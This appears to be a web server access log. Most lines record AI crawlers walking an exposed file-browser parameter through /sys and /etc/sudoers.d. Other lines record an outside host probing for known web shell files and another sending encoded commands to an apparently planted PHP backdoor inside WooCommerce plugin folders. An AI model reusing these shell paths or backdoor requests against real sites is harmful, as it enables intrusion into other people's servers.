74.7.241.10 - - [02/Aug/2026:01:52:09 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory1/subsystem/devices HTTP/1.1" 200 4928 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory1/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:12 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory6/subsystem/devices HTTP/1.1" 200 4925 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory6/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:15 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory1/power HTTP/1.1" 200 3470 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:18 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory8/power HTTP/1.1" 200 3469 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:50:00 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633313830302p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383230302q3631666431356531346162396264613639653932373161386535333365333132222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:52:21 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory6/power HTTP/1.1" 200 3467 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
4.223.140.16 - - [02/Aug/2026:01:52:23 +0200] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 200 69033 "-" "-"
4.223.140.16 - - [02/Aug/2026:01:52:24 +0200] "GET /this_is_a_new_hello_world.php HTTP/1.1" 403 448 "-" "-"
4.223.140.16 - - [02/Aug/2026:01:52:24 +0200] "GET /IndoSec.php HTTP/1.1" 403 448 "-" "-"
4.223.140.16 - - [02/Aug/2026:01:52:24 +0200] "GET /1revo.php HTTP/1.1" 403 448 "-" "-"
4.223.140.16 - - [02/Aug/2026:01:52:24 +0200] "GET /loader.php HTTP/1.1" 403 448 "-" "-"
4.223.140.16 - - [02/Aug/2026:01:52:25 +0200] "GET /esp.php? HTTP/1.1" 403 448 "-" "-"
4.223.140.16 - - [02/Aug/2026:01:52:25 +0200] "GET /dj.php HTTP/1.1" 403 448 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:52:24 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory2/power HTTP/1.1" 200 3465 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:27 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory1 HTTP/1.1" 200 3506 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:31 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory7 HTTP/1.1" 200 3506 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:34 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory3 HTTP/1.1" 200 3506 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:37 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory7 HTTP/1.1" 200 3506 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:40 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory9 HTTP/1.1" 200 3508 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:50:22 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633313832322p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383232322q3232396137663335393635336633656631643862623032643065323031666637222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:52:43 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory5 HTTP/1.1" 200 3508 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:46 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7 HTTP/1.1" 200 3508 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:49 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory1 HTTP/1.1" 200 3508 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:53 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory6 HTTP/1.1" 200 3508 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:56 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory9 HTTP/1.1" 200 3507 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:59 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory3 HTTP/1.1" 200 3507 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:53:02 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory1/subsystem HTTP/1.1" 200 3321 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:53:05 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory7/subsystem HTTP/1.1" 200 3321 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:50:44 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633313834342p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383234342q3766323961666233636162643366343664653337373964326261383362616633222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:53:08 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory3/subsystem HTTP/1.1" 200 3321 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:53:11 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory7/subsystem HTTP/1.1" 200 3321 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:53:15 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory9/subsystem HTTP/1.1" 200 3322 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:53:18 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory5/subsystem HTTP/1.1" 200 3323 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:53:21 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem HTTP/1.1" 200 3323 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:53:24 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory1/subsystem HTTP/1.1" 200 3323 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:53:27 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory6/subsystem HTTP/1.1" 200 3323 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:51:07 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633313836372p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383236372q6536343632393866646232623866333835396536366133396336633737396334222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:53:30 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory9/subsystem HTTP/1.1" 200 3324 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:53:33 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory3/node0 HTTP/1.1" 200 5378 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:53:37 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory1/subsystem/devices HTTP/1.1" 200 4925 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory1/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:53:40 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory7/subsystem/devices HTTP/1.1" 200 4925 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory7/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:53:42 +0200] "GET /?path=%2F%2Fopt%2Ffphp%2Finclude%2Fphp%2Fext%2Fdom HTTP/1.1" 200 3074 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:53:43 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory3/subsystem/devices HTTP/1.1" 200 4925 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory3/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:53:44 +0200] "GET /?path=%2F%2Fopt%2Ffphp%2Finclude%2Fphp%2Fext%2Fpdo HTTP/1.1" 200 3162 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:53:46 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory7/subsystem/drivers HTTP/1.1" 200 2871 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory7/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:53:49 +0200] "GET /?path=%2F%2Fetc%2Fsudoers.d HTTP/1.1" 200 2760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:53:49 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory9/subsystem/devices HTTP/1.1" 200 4926 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory9/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:51:29 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633313838392p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383238392q6165666464333965363562313434663337363131626262666337636634346130222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:01:53:51 +0200] "GET /?path=%2F%2Fsys%2Fmodule%2Fasync_xor%2Fholders HTTP/1.1" 200 3115 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:53:52 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory5/subsystem/drivers HTTP/1.1" 200 2873 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory5/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:53:54 +0200] "GET /?path=%2F%2Fsys%2Fmodule%2Fvirtio_pci_modern_dev HTTP/1.1" 200 3100 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:53:56 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/devices HTTP/1.1" 200 4927 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:53:57 +0200] "GET /?path=%2F%2Fsys%2Fmodule%2Fvirtio_scsi HTTP/1.1" 200 3121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:53:59 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem/drivers HTTP/1.1" 200 2873 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory7/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:54:00 +0200] "GET /?path=%2F%2Fsys%2Fbus%2Fmachinecheck%2Fdrivers HTTP/1.1" 200 2779 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:54:02 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory6/subsystem/drivers HTTP/1.1" 200 2873 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory6/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:54:04 +0200] "GET /?path=%2F%2Fsys%2Fclass%2Ftty%2FttyS15 HTTP/1.1" 200 3666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
